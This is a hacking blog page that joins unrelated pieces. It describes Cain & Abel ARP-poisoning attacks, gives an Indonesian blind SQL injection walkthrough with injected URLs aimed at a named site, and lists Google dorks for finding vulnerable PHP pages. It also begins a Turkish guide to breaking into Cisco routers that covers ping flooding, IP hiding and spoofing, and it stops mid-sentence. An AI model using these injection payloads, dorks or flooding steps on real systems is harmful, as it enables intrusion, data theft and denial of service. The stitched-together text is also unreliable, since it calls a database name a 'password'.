Sayfalar

8 Temmuz 2010 Perşembe

Cain & Abel (Hacking - Çok Geniş Anlatım) !

Cain Abel ne yapar? “Man in the Middle” olarak adlandırılan “ortadaki adam” saldırısını, ARP zehirlemesi kullanarak gerçekleştirir böylece ağ’daki kullanıcıların özel bilgilerini görmektedir. Bunu yaparken desteklediği protokoller oldukça fazladır böylelikle örneğin bir banka/alışveriş sitesinde kredi kartını kullanan bir kullanıcının site/sayfa SSL’li dahi olsa bilgilerini görmek mümkündür. Program kablosuz ağ’lara bağlanarak gene bu tip işlemlerin yapılmasını desteklemektedir.


Yazının anlaşılabilmesi için belki bildiğiniz belkide bilmediğiniz bazı protokolleri ve terimleri açıklamak gerekli. Lütfen ne kadar “biliyorumda” desenizde “SÖZLÜK” bölümünü gözden geçirmeyi ihmal etmeyin.


Sözlük



ARP Adres Çözümleme Protokolü - Vikipedi Address Request Protocol, lokal ağ’larda paketlerin gönderilmesini/alınmasını sağlayan ikinci katmanda (L2) çalışan protokol. OSI OSI Modeli - Vikipedi katmanlama modeline göre temel amacı, L3’den gelen adresleme paketlerine L2 adresleme paketlerini eklemektir. DOD TCP/IP model - Wikipedia, the free encyclopedia katmanlama modeline göre temel amacı, L2’den gelen adresleme paketlerine L1 adresleme paketlerini eklemektir.


IP IP adresi - Vikipedi Internet Protocol, internet ağ’ına bağlı her cihazın kendine ait en az bir adet IP adresi vardır bu adres başka hiçbir cihazda yoktur. Böylelikle “adresleme” sağlanmaktadır. IP protokol’ünü geliştiren ekip DOD modelini geliştirmiştir ve daha sonra geliştirilen OSI modelini “benimsememiştir”. Bu bakımdan bilişime yeni başlayan birinin L2’si eskilerin L1’ine denk gelmektedir, bu da bazen karışıklıklara sebep olmaktadır.


IPv4 IP adresi - Vikipedi 32bit uzunluğuna sahiptir, güvenlik özelliği yoktur. Bu bakımdan güvenli haberleşmeyle ilgili protokoller daha üst katmanlarda çalışır.


IPv6 IPv6 - Vikipedi 128bit uzunluğundadır, güvenlik özelliği vardır. Yaklaşık 10 yıldır geliştirilmektedir ve yaygınlaşması için belirlenen plana göre 2007 yılında tüm dünyanın geçmesi beklenmektedir.


Ethernet; Dünyada en yayğın olarak kullanılan arabirimin adıdır. 1973 yılında Xerox firması tarafından geliştirilmiş ve standartları DEC, Intel ve Xerox tarafından belirlenmiştir. Yaygın kullanıma 3Com firması sunmuştur.


Wirespeed Wire speed - Wikipedia, the free encyclopedia Switch’e gelen paketin işlenmesi gecikmelere sebep olur (switch marka modeline göre; 10Mbit 40-70ms, 100Mbit 11-30ms, 1Gbit 4-8ms). Wirespeed özelliğine sahip switch’te böyle bir gecikme yaşanmaz. Böylece örneğin 1Gbit hızındaki porttan saniyede enaz 84byte’lık 1.448.000 adet, 1500byte’lık 83.333 paket (10Mbit’te 84byte’lık 14.880 adet, 100Mbit’te 84byte’lık 148.800 adet” veya “10Mbit’te 1500byte’lık 833 paket, 100Mbit’te 1500byte’lık 8.333 paket) gecikmeksizin işlenerek geçer.



Switch Ağ anahtarı - Vikipedi Anahtarlayıcı, portlarına takılı cihazların, host’ların, sunucuların ve istemcilerin macid’lerini ve hangi port’larda olduklarını kendi üstündeki bir tabloda tutarak ve sürekli güncelleyerek, “a” port’undan gelen paketin hedef macid’sini tablodan bulup, uyan port “b”ye gönderir.


PoE Power over Ethernet - Wikipedia, the free encyclopedia Power over Ethernet, ethernet portuna bağlanan PoE desteği bulunan cihaza (örneğin ip kamera) elektrik (1.8-60 volt) verilmesini sağlar. Böylece cihazın ayrıca bir elektrik kablosu kullanması gerekmez. Kullanılan CATx kablonun kaliteli olmasına özellikle dikkat edilmelidir.


L1 Fiziksel katman - Vikipedi OSI; Birinci katman fiziksel katman, paketin hangi tür arabirim ile aktarılacağını ve iletimini sağlar. Üst katmanlardan gelen paketler binary olarak kodlanmışken bu katmanda, arabirimin tipine göre elektrik veya ışık sinyallerine çevirilir.



L2 Veri bağlantısı katmanı - Vikipedi OSI; İkinci katman veri bağlantısı katmanı, genellikle arabirimin içindedir bazı durumlarda işletim sistemi sürücüsü olarakta adlandırılır. Diğer cihazları/sunucu/istemcileri bulma, verinin gönderilme zamanının denetimi, iletimi ve hata kontrolümü yapar.


L3 Bilgisayar ağı - Vikipedi OSI; Üçüncü katman ağ katmanı, örneğin IP ve icmp bu katmanda çalışır, paketin ağ dışında bir başka ağ’a gönderilip gönderilmeyeceğine ve gönderilmesi durumunda paketteki adres değişimlerinden sorumludur.


L4 http://tr.wikipedia.org/wiki/Transport OSI; Dördüncü katman taşıma katmanı, veri paketlerinin arabirimin tipine göre ne kadarlık olacağına karar verip ayrımlarda bulunur. Port işlemleri bu katmanda yer alır, TCP ve UDP gibi protokollerin çalıştığı katmandır.


N-B Asynchronous I/O - Wikipedia, the free encyclopedia Non-Blocking, switch’in, tüm portlarının hızlarının toplamından daha yüksek kapasiteli işleme gücü varsa, paket kaybı olmaksızın tüm portları tam kapasite çalıştırabileceğiniz anlamına gelir.


Gbit Gigabit - Wikipedia, the free encyclopedia 1000Mbit’lik hız değerini temsil eder. Bu tür bir ortamda kaliteli switch, kablo ve kablolama kalitesi iyi durumdaysa saniyede enaz “84byte’lık 1.488.000 adet veya 1500byte’lık 83.333 adet paket geçebilir.


UpLink Switch ortamlarda istemci ve sunucu hariç diğer bağlantıların yapıldığı port’lara verilen isimlendirmedir.


DHCP DHCP - Vikipedi Dynamic Host Configuration Protocol, ağ’daki host’lara istemci’lere otomatik olarak IP ve diğer servislerle ilgili IP adreslerini veren servistir.


MacID MAC adresi - Vikipedi Media Access Control, 48bit uzunluğunda dır ve ilk 24bit üretici numaralarına ayrılmıştır, kanal 24bit her üreticinin kendi vereceği sıra numaraları gibi düşünülebilir. Dünyada üretilen arabirimlerin (örneğin ethernet kartınız) hiçbirinin macid’si diğeri ile aynı değildir, böylece ARP adreslemesi sorunsuz olarak çalışır.


Peki yönetici ile Cain&Abel kullanan arasında ne fark vardır?


Temeldeki teknik fark şudur, birinci yöntemde ağda fazladan paket oluşumunu engelleyip yükü switch üstünde tutarak dinleme yapılmaktadır ve sorunu çözmeye yönelik kullanılır. ARP zehirleme saldırısında ise art niyetli kişi söz konusudur ve ağda fazladan paket oluşmasına sebep olarak ağdaki tüm switch’lere yük bindirir.


Dummy kullanıcı nedir?


Böyle birşeyin varlığından haberi bile yokken “hacker (lamer)” arkadaşı veya bir “hacker (lamer)”la yaptığı konuşmada ARP Poisoning lafını merak eder, google açıp “arp poison” yazar ikinci linke www.oxid.it tıklar...

blind-sql-injection-dummy

Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa...



Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama

http://iseng.com/news.php?id=76009

Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...

Langsung aja aku ketik

http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE

http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE

Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)

http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...

~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.

~ 1,1 adalah urutan dari value tersebut.

~ CHAR adalah peubah dalam desimal

~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65

Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)

TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)

Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)

Cari nilai kedua dan caranya adalah...

http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)

Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...

Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)

Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi

http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)

67=C
82=R
85=U
90=Z
51=3
78=N

Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)

Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...

Contoh:

http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)

Jadi password yang didapat adalah...

75=K
69=E
82=R
69=E
78=N

Jadi username dan passwordnya adalah CRUZ3N dan KEREN...

Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...

Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).

Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna...

Nih kode ASCII yang sapa tau berguna...

Char Code Description

9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< 60 Less-than sign
= 61 Equals sign
> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
 127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis


* Contact
cruz3n@jasakom.org

* Blog Sederhana
http://cruzenaldo.co.cc

* Thanks
~ my JESUS CHRIST
~ Bokap dan keluarga dirumah
~ Temen2 di kupang...
~ All Jasakomers yang telah membuat hidup gw penuh warna... ;p
~ Witha Rasmana a.k.a Chrn0 (I Love You...)

new-sql-injection-dork

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

Exploiting Cisco Systems(Windows)

Exploiting Cisco Systems(Windows)





Bu dokuman bir seri ispatlanmis cisco exploitlerinin sisteme erisim saglamak icin nasil kullanilacagini adim adim anlatacaktir. Eger bir cisco router’a girerken yakalanir ya da sistemi bozarsaniz yuzlerce internet kullanicisini zor durumda birakir, binlerce dolar hasara neden olabilirsiniz, o yuzden sadece izniniz varsa deneyin bunlari J yanlis sekilde kullanilmasi basinizi cok derde sokabilir.



Baslamadan once bilmeniz gerekenler



IP adres nedir?


IP, Internet protokolunun kisaltilmis halidir. IP adresleri bilgisayarlar tarafindan kendilerine baglanmis diger bilgisayarlari taminada kullanilir. Bu IRC den nasil banlandiginizdir ve nasil ISS inizin bulunmasidir. IP adresleri cok kolaylikla alinirlar.



IP adresi bulmak icin su yontemler kullanilir :



Bir websitesine gidersiniz ve IP niz loglanir· IRC de isteyen herkes IP nizi alabilir· ICQ da “IP mi gosterme” secenegini secmis dahi olsaniz yine de IPniz alinabilir· Eger bir yere baglanmissaniz, “systat” yazarak kimin baglanmis oldugunu gorebilirler.· Birisi eger size IP-logging java li bir email gondermisse, ayni zamanda sizin IP nizi de alirBunlardan baska IP adresini almak icin bir cok yontem vardir, back-door programlari sub7 ya da NetBus kullanmak gibiISS nedir?ISS, internet servis saglayicisinin kisaltilmisidir, ve size interneti veren firmadir. Dial-up yapip bir baglanti sagladiginizda baglandiginiz sistemdir. Isteyen birileri sizin ISS inizi size bir traceroute uygulayarak bulabilir ( traceroute daha ilerde aciklanacaktir).



Su sekildedir :


tracert 222.222.22.22Tracing route to [221.223.24.54]over a maximum of 30 hops.1 147ms 122ms 132ms your.isp [222.222.22.21]2 122ms 143ms 123ms isp.firewall [222.222.22.20]3 156ms 142MS 122ms aol.com [207.22.44.33]4 * * * Request timed out5 101ms 102ms 133ms cisco.router [194.33.44.33]6 233ms 143ms 102ms something.ip [111.11.11.11]7 222ms 123ms 213ms netcom.com [122.11.21.21]8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]Trace complete.



TCP/IP packeti nedir?


TCP/I . Transmission Control Protocol and Internet Protocol’unun kisaltilmisidir, bir TCP/IPPacketi sIkistirilmis sonra bir header (baslik) eklenmis ve baska bir bilgisayara gonderilmis blok halinde bir datadir. Butun internet transferlerinin paketler gondererek nasil olustugudur. Bir paketteki header (baslik), paketi gonderen bilgisayarin IP adresini icerir. Bir paketi yeniden yazip herhangi birinden gelmis gibi gosterebilirsiniz.



Bir cok sisteme erisim saglamak icin bunu kullanabilirsiniz ve yakalanmazsiniz.Linux calistiriyor olmaniz ya da bunu yapmanizi saglayacak bir programinizin olmasi gerekir.Ipnizi nasil saklarsiniz:Genius 2 ya da DC IS gibi programlardan birini bulun, bunlar sizin IdentD calistirmaniza izin veriri. Isteginize bagli olarak bilgisayarinizin kimliginin bir parcasinin degistirmenize yardim eder. Bunu IRC chat roomlardan banlandiginizda kullanin… hemencecik geri girersiniz. Ayni zamanda baska bir sisteme erisirken de kullanabilirsiniz, bu sekilde yanlis bir kimligi loglarlar.



Telnet nasil kullanilir:


Telneti kolayca baslat menunuzden calistiri secip telnet yazmak suretiyle acabilirsiniz. Telneti actiktan sonra bazi ozellikleri degistirmek isteyebilirsiniz. Terminal>Preferences uzerine tiklayin. Burdan buffer size ini , fontu ve diger seyleri degistirebilirsiniz. Ayni zamanda “local echo” yuacabilir ya da kapatabilirsiniz. Eger “local echo”yu acarsaniz, bilgisayariniz size yazdiginiz her seyi gosterir, ve bagli bulundugunuz bilgisardakileri de. Boylece bilgisayarinizda “hello” yazdiginizda “hhelelollo” seklinde bir karsilik alirsiniz. Bunun nedeni, bilginin geri gelerek sizin yazdiginizla karismasidir, bu ozelligi sadece bilgisayarin ne yazdigimi bana geri gonderip gondermedigini gormek icin kullanirim.



Default olarak telnet,telnet portundaki ( port 23) bir sisteme baglanir. Her zaman 23uncu porta baglanmak istemeyebilirsiniz, o zaman baglantiya gittiginizde port u mesela 25 e cevirebilirsiniz, ki bu mail serverlarinin portudur. Ya da FTP icin 21 e. Binlerce degisik port vardir, bu yuzden dogru olani sectiginizden emin olun.



HyperTerminal nasil kullanilir ?



HyperTerminal, belirli bir bilgisayara giren bilgiyi dinlemeniz icin kendi bilgisayarinizdan herhangi bir porttan bir server acmaniza musade eder. Bunu kullanmak icin Baslat >> programlar >> donatilar >> iletisim >> HyperTerminal secmeniz yeterli. Once bir baglanti secmeniz gerekir, TCP/IP Winsock I secin, sonra iletisim kuracaginiz bilgisayari yazin, ve port numarasini belirleyin. HyperTerminale inputlari dinlemesini soyleyebilirsiniz su sekilde: Call >> wait for call. Simdi diger bilgisayar size o porttan baglanir ve chat yapabilir dosya transfer edebilirsiniz.



Ping nasil kullanilir :


Ping cok basittir, sadece MS-DOS u acin ve “ping ip adresi “ yazin. Default olarak 3 kere ping yapar, fakat “ping ip adres -t” yazarsaniz sonsuza kadar pingler. Ping buyuklugunu degistirmek icin sunu yapin : "ping -l (size) ip.address" . Pingin yaptigi bir bilgisayara bir data paketi yollamak, ve ne zaman geri donecegini beklemektir, bununla bilgisayarin baglanti hizi ve paketin gidip geri gelmesi esnasinda gecen zaman ( “trip time” olarak adlandirilir ) anlasilir.



Ping ayni zamanda bir sistemi yuklu sayida ping flood ederek yavaslatmak ya da cokertmek icin de kullanilabilir. Windows 98 bir dakikalik ping floodundan sonra cokebilmektedir. Bir ping flood saldirisi hedefinizden cok sizden yuksek oranda bandwidth alir( eger saldirdiginiz bir Windows 98 makine ve sizin modeminiz orta halli birseyse o zaman bir dakika icinde sistemi cokertmeniz mumkun ) . Ping flood kuvvetli hedeflerde etkili olmaz. Not : DOS un -t secenegi ping flood yapmaz, sadece hedegi surekli pingler, bir pingle digerinin arasinda bir ara vererek. Her Unix ve Linux makinelerde, ping -f kullanarak gercek bir ping flood yapabilirsiniz.



Aslinda ping -f distribution ininizin POSIX-compliant olabilmesi icin gereklidir. TraceRoute nasil kullanilir :Baglantinizi izlemek icin ( ve de sizinle hedefiniz olan bilgisayar arasindaki tum bilgisayarlari gorebilmek icin ) sadece MS_DOS acin ve "tracert ip.address" yazin. Boylelikle sizinle hedefiniz arasindaki bilgisayarlarin listesini alirsiniz. Bunu arada herhangi bir seyi blocklayan bir firewall un olup olmadigini anlamak icin kullanabilirsiniz. Ve bununla birlikte bir kisinin ISS ini de anlamaya kullanilabilir bu komut. ISS I ayirt etmek icin listedekien sondan bir onceki IP adresine bakin, bu ISS in routerlarindan birinin adresi olacaktir ihtimalle.



Basitce traceroute soyle calisir :


Bir TCP/IP paketi headerinda ( basliginda ) TTL (time to live ) adi verilen bir deger tasir. Paketin her sekmesinde bu deger bir azalir. Bu sadece bir seylerin yanlis giderek paketin net uzerinde surekli sekmesini ve dolayisiyla bandwidth harcamasini onlemek icindir. Bir paketin TTL I sifir oldugu anda paket olmekte ve bir ICMP hatasi gonderici bilgisayara gonderilmektedir.Simdi, traceroute once TTL degeri 1 olan bir paket gonderir, Bu paket cabucak geri doner,ve ICMP hata basligindaki gonderenin adresine bakarak,traceroute paketin ilk sekmesinde nerde oldugunu gorur. Sonra ikinci bir paket TTL degeri 2 olarak yola cikarilir ve ikinci sekmeden sonra geri doner ve takildigi makinenin kimliginide getirerek. Bu bu sekilde paket hedefine ulasana kadar devam eder.



Proxy server nasil kullanilir ?


Web de istediginiz bir portta calisan bir proxy server aramasi yapin. Bir tane buldugunuzda, telnetle ya da hyperterminalle ona baglanin, sonra dabu server uzerinden baska bir makineye baglanin. Boylelikle diger ucdaki bilgisayar sizin IP adresinizi bilemez.



Bolum 1:



neden bir cisco router hacklensin ?Cunku sistemlere giris yapmak icin kullanislidirlar. Cisco routerlar, bazilari bir sistemde 18 T1 baglantisiyla , cok hizlidirlar, ve cok esnektirler ve DoSsaldirilarinda kullanilabilirver ya da baska sistemleri hacklemek icin kullanilabilirler. Bir anda binlerce paket uzerlerinden gecer ve bunlar yakalanip decode edilebilirler. Bir cok Cisco router guvenilir sistemlerdir,ve kendi networkundaki bilgisayarlara baglanabilmeniz icin size belli miktarda izin verir.



Bolum 2:



bir cisco router bulmak Cok basittir, hemen hemen her ISS en az bir Cisco router uzerinden gecer. Bir cicso router bulmanin en kolay yolu DOS da traceroute calistirmaktir (“tracert ipAddress”). Hemen hemen herkesi tracert edebilisiniz cunku trace aradaki tum bilgisayarlarin listesini verecektir sizinve hedefiniz arasindaki. Ve bu sistemler biri muhtemelen cisco ismini tasiyor olacaktir. Bu sekilde bir tane bulursaniz, IP adresini not alin. Simdicisco router un nerde oldugunu biliyorsunuz fakat kendisini koruyan bir firewall olabilir, dolayisiyla blocklanip blocklanmadigini anlamak icin bir kac kere pinglersiniz. Eger pinginiz geri donuyorsa blocklanmami olabilir. Baskabir yolda, bazi Cisco router portlarina erisimi denemektir, bunu da basitcetelneti kullanarak ve port 23 deki bir router a bir baglanti acarak yapabilirsin. Eger bir sifre sorarsa fakat kullanici adi sormazsa routerdasindir, fakat, eger kullanici adi da isterse o zaman buyuk ihtimallebir firewalldasindir. Bu dokumanin amaci routerda ne yapilabilir oldugu ve firewall nasil atlatilir anlatilmayacagi icin firewall olmayan bir router bulmayi deneyin. Iyi bir 